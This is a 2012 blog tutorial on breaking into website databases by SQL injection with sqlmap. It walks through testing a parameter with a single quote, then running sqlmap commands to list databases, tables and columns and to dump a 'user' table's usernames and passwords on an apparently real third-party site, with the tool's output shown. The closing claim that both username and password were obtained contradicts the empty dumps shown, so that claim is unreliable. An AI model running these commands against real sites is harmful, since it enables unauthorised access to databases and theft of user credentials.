Nov 30, 2012

Hacking Website Database with SQLmap in Backtrack 5 or Linux OS


All we needed is a vulnerability webpage. Lets say you have a url like this



http://www.site.com/section.php?id=51



and that it is prone to sql injection because the developer of that site did not properly escape the parameter id.



This can be simply tested by trying to open the url



http://www.site.com/section.php?id=51'



We just added a single quote in the parameter. If this url throws an error then it is clear that the database has reacted with an error because it got an unexpected single quote..



To understand the process please change video quality to 1080p and watch in HD Quality







 


Step 1 - Finding Databases


 


python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 --dbs


 


 


Output


----------


 


web application technology: Apache, PHP 5.4.9


back-end DBMS: MySQL 5.0.11


[13:00:51] [INFO] fetching database names


available databases [2]:


[*] 554777


[*] information_schema


 





 


Step 2 - Finding the table names


 


python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 -D 554777 --tables


 


Output


----------


 


web application technology: Apache, PHP 5.4.9


back-end DBMS: MySQL 5.0.11


[13:01:25] [INFO] fetching tables for database: '554777'


Database: 554777


[6 tables]


+---------------+


| abstract      |


| answer        |


| author        |


| news_details  |


| reporter_list |


| user          |


+---------------+


 





 


Step 3 - Finding the columns


 


python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 -D 554777 -T user --columns


 


Output


----------


 


web application technology: Apache, PHP 5.4.9


back-end DBMS: MySQL 5.0.11


[13:01:48] [INFO] fetching columns for table 'user' in database '554777'


Database: 554777


Table: user


[3 columns]


+----------+-------------+


| Column   | Type        |


+----------+-------------+


| password | varchar(50) |


| role     | varchar(50) |


| username | varchar(50) |


+----------+-------------+


 





 


Step 4 - Finding column values


 


python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 -D 554777 -T user -C username --dump


 


Output


----------


 


Database: 554777


Table: user


[0 entries]


+----------+


| username |


+----------+


+----------+


 


 


python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 -D 554777 -T user -C password --dump


 


 


Output


----------


 


Database: 554777


Table: user


[0 entries]


+----------+


| password |


+----------+


+----------+


 


 


So we get both username and password.



 
Posted by at
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)